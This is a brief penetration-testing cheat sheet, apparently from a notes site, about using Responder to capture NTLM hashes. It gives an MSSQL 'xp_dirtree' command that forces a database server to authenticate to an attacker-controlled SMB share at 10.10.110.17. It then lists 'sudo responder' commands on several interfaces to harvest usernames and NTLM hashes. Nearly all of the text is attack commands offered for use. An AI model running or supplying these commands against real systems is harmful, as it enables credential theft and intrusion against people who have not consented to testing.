Responder
# Once connected to MSSQL this will acccess the share
EXEC master..xp_dirtree '\\10.10.110.17\share\'
# Attacker machine you will get the user hash
sudo responder -I tun0# Just run this in the victime machine and it will spit out NTLM hash with username
sudo responder -I ens224
sudo responder -I ens33Last updated